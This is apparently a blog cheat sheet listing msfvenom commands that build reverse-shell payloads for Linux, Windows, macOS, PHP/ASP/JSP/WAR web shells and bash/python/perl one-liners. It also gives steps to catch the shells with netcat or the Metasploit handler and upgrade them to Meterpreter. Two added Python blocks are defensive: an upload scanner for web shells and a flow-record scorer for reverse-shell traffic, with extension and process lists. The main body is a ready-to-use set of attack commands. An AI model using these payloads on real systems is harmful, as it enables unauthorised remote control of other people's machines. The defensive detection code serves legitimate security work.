Sunday 9 April 2017

Generating Metasploit Payloads : Creating Metasploit Reverse Shell

Below are the different types of Metasploit payloads that can be generated with msfvenom to obtain a reverse shell from a target machine.

These payloads are used in Metasploit by running set payload "<payloadname>" inside the multi handler, which has to be loaded first with use exploit/multi/handler.

The payloads listed below require certain inputs as options, such as LHOST (the address the shell connects back to) and LPORT (the port the handler listens on).

Operating System Based Binary Shells

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f elf > shell.elf

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe

msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho

Web Payloads : Usually For RFI, SQL Injection

msfvenom -p php/meterpreter_reverse_tcp LHOST=attackerip LPORT=attackerport -f raw > shell.php

Open shell.php in a text editor and remove the "#" at the very start of the file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f asp > shell.asp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f raw > shell.jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f war > shell.war
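Each of these web payloads only does anything once the file is stored on the target web server under a name (or in a form, such as a .war) that the server will execute. As an added defensive example, not part of this post and not Metasploit code, the Python below is the kind of check an upload handler or a periodic scan of a web root's upload directory can apply: it flags server-side extensions anywhere in the file name (so double extensions are caught too), files whose content begins with a server-side script tag regardless of name, and zip archives laid out as a deployable .war. The names and bytes in SAMPLE_UPLOADS are constructed placeholders, and SERVER_SIDE_EXTS and SCRIPT_MARKERS are assumptions to tune for the stack in use.

```python
"""Flag uploaded files that a web server could execute as a server-side payload.

Added example; not code from this post or from Metasploit. File names and bytes in
SAMPLE_UPLOADS are constructed; the extension and marker lists are assumptions.
"""
from __future__ import annotations

import io
import zipfile

# Extensions the common web servers hand to a script engine (assumption; extend per stack).
SERVER_SIDE_EXTS = {".php", ".php3", ".php5", ".phtml", ".asp", ".aspx", ".jsp", ".jspx", ".war"}
# Opening tags that mark PHP code, ASP/JSP scriptlets and JSP actions.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<jsp:")


def looks_like_war(data: bytes) -> bool:
    """A .war is a zip with a WEB-INF/ tree; judge by the bytes, not by the file name."""
    if not data.startswith(b"PK"):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(name.startswith("WEB-INF/") for name in zf.namelist())
    except zipfile.BadZipFile:
        return False


def classify_upload(name: str, data: bytes) -> list[str]:
    """Return the reasons a file should be rejected or quarantined (empty if none)."""
    reasons: list[str] = []
    # Check every dotted segment after the first, so "avatar.php.jpg" is caught too.
    for segment in name.lower().split(".")[1:]:
        if "." + segment in SERVER_SIDE_EXTS:
            reasons.append(f"server-side extension .{segment}")
            break
    head = data.lstrip()[:64]
    if any(head.startswith(marker) for marker in SCRIPT_MARKERS):
        reasons.append("content begins with a server-side script tag")
    if looks_like_war(data):
        reasons.append("zip archive laid out as a deployable .war")
    return reasons


def scan_uploads(uploads: dict[str, bytes]) -> dict[str, list[str]]:
    """Map each flagged file name to its reasons; clean files are omitted."""
    flagged = {}
    for name, data in uploads.items():
        reasons = classify_upload(name, data)
        if reasons:
            flagged[name] = reasons
    return flagged


def build_sample_war() -> bytes:
    """Constructed stand-in for a .war: a zip with WEB-INF/web.xml and a harmless page."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr("index.jsp", "<html>placeholder</html>")
    return buf.getvalue()


# Constructed sample uploads; the "script" contents are inert placeholders.
SAMPLE_UPLOADS = {
    "avatar.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "report.pdf": b"%PDF-1.4 placeholder",
    "avatar.php.jpg": b"\xff\xd8\xff\xe0",                 # double extension, image bytes
    "notes.txt": b"   <?php echo 'placeholder'; ?>",        # script content, innocent name
    "theme.zip": build_sample_war(),                        # .war renamed to .zip
    "shell.asp": b"<% Response.Write(\"placeholder\") %>",
}


if __name__ == "__main__":
    for name, reasons in scan_uploads(SAMPLE_UPLOADS).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The content check matters more than the extension check: a renamed file keeps its bytes, and a server that maps handlers by extension will still run an uploaded .php file if some later misconfiguration or rename exposes it. Rejecting on either signal, and storing accepted uploads outside the document root, removes the place these payloads need to land.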

Script Based Payloads:

These are written to standard output, so redirect the output to a file as needed.

msfvenom -p cmd/unix/reverse_python LHOST=attackerip LPORT=attackerport -f raw

msfvenom -p cmd/unix/reverse_bash LHOST=attackerip LPORT=attackerport -f raw

msfvenom -p cmd/unix/reverse_perl LHOST=attackerip LPORT=attackerport -f raw

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Simple TCP Reverse Shell
Handling The Reverse/Bind Connection

You can handle these reverse connections with Netcat or with the Metasploit multi handler module.

Netcat : on your attacking machine run: nc -nlvp <attackerport>

Metasploit : in msfconsole, follow the steps below to handle the reverse connection

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <AttackerIp>
set LPORT <AttackerPort>
exploit (this drops you into the session as soon as the payload runs on the target)
exploit -j (this runs the handler as a background job, so the session is backgrounded immediately when the reverse shell arrives)

Note - Sometimes you will not get a Meterpreter reverse shell, or the session dies immediately, for various reasons. In that case, first try a plain Windows shell:

use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST <AttackerIp>
set LPORT <AttackerPort>
exploit -j (this backgrounds the session immediately after the reverse shell arrives; you can then interact with it using sessions -i <sessionnumber>)

Now use this command to upgrade the plain reverse TCP shell into a Meterpreter session:
sessions -u <numberofsession>
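Every payload on this page does the same thing on the network: the compromised host opens an outbound TCP connection to LHOST:LPORT and keeps it open for the life of the session, while the handler above just waits for it. That shape is also what a defender can look for. The Python below is an added example, not part of this post and not Metasploit code: it scores flow records for outbound connections from internal hosts that go to a port the host has no normal reason to reach, stay open for a long time while moving few bytes, or are initiated by a process that normally only serves inbound requests. The CSV in SAMPLE_FLOWS is constructed, "internal" means the RFC 1918 ranges, and EXPECTED_PORTS and SERVER_PROCESSES are assumptions to adjust per environment.

```python
"""Score flow records for reverse-shell-style outbound connections.

Added example; not Metasploit code. Flow lines are a Zeek-conn-like CSV constructed
below; the port list and process list are assumptions to tune per environment.
"""
from __future__ import annotations

import csv
import ipaddress
from io import StringIO

# RFC 1918 ranges count as "internal"; everything else is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Ports an internal host is normally expected to reach on the internet (assumption).
EXPECTED_PORTS = {80, 443, 8080, 8443, 53, 25, 587, 123}
# Processes that serve inbound requests and rarely open outbound TCP themselves (assumption).
SERVER_PROCESSES = {"w3wp.exe", "php-fpm", "apache2", "httpd", "nginx", "java", "tomcat"}
LONG_LIVED_SECONDS = 300        # an interactive shell stays connected for minutes or hours
LOW_VOLUME_BYTES = 64 * 1024    # while moving only a few KB of typed commands and output

# Constructed sample flows (not real traffic). Columns follow a Zeek conn.log subset
# plus a process name, as an EDR or network sensor might attach it.
SAMPLE_FLOWS = """\
ts,src_ip,src_port,dst_ip,dst_port,proto,duration_s,orig_bytes,resp_bytes,proc
1491700000,10.0.5.21,51422,203.0.113.9,443,tcp,0.9,1420,38211,chrome.exe
1491700010,10.0.5.40,49233,198.51.100.77,4444,tcp,1824.5,2210,9130,w3wp.exe
1491700012,10.0.5.40,49234,10.0.5.2,3306,tcp,600.2,50000,800000,w3wp.exe
1491700020,10.0.5.33,40122,198.51.100.77,8443,tcp,3.2,700,3100,java
1491700030,10.0.5.18,55012,192.0.2.10,53,udp,0.01,60,120,systemd-resolved
1491700040,10.0.5.60,38877,192.0.2.44,31337,tcp,2900.0,3100,18000,python3
"""


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def score_flow(row: dict) -> list[str]:
    """Return the reasons one flow resembles a reverse-shell channel (empty if none)."""
    reasons: list[str] = []
    if row["proto"] != "tcp":
        return reasons
    # Only outbound internal -> external flows: that is the direction a reverse shell takes.
    if not is_internal(row["src_ip"]) or is_internal(row["dst_ip"]):
        return reasons
    dst_port = int(row["dst_port"])
    duration = float(row["duration_s"])
    total_bytes = int(row["orig_bytes"]) + int(row["resp_bytes"])
    if dst_port not in EXPECTED_PORTS:
        reasons.append("non-standard destination port")
    if duration >= LONG_LIVED_SECONDS:
        reasons.append("long-lived session")
        if total_bytes < LOW_VOLUME_BYTES:
            reasons.append("low volume for its duration")
    if row["proc"] in SERVER_PROCESSES:
        reasons.append("server process initiated outbound connection")
    return reasons


def find_reverse_shell_candidates(flow_csv: str, min_reasons: int = 2) -> list[dict]:
    """Parse CSV flow records and return those with at least min_reasons indicators."""
    hits = []
    for row in csv.DictReader(StringIO(flow_csv)):
        reasons = score_flow(row)
        if len(reasons) >= min_reasons:
            hits.append({"src_ip": row["src_ip"], "dst_ip": row["dst_ip"],
                         "dst_port": int(row["dst_port"]), "proc": row["proc"],
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_reverse_shell_candidates(SAMPLE_FLOWS):
        print(f"{hit['src_ip']} -> {hit['dst_ip']}:{hit['dst_port']} "
              f"({hit['proc']}): {', '.join(hit['reasons'])}")
```

No single indicator is decisive: a long quiet connection to an odd port is what many legitimate agents also look like, which is why the code requires two reasons before reporting. The combination that stands out in the sample is a web server worker process holding an outbound session for half an hour, which matches exactly what the web payloads above produce once executed; egress filtering that only allows servers to reach the ports in EXPECTED_PORTS turns the same rule into a preventive control.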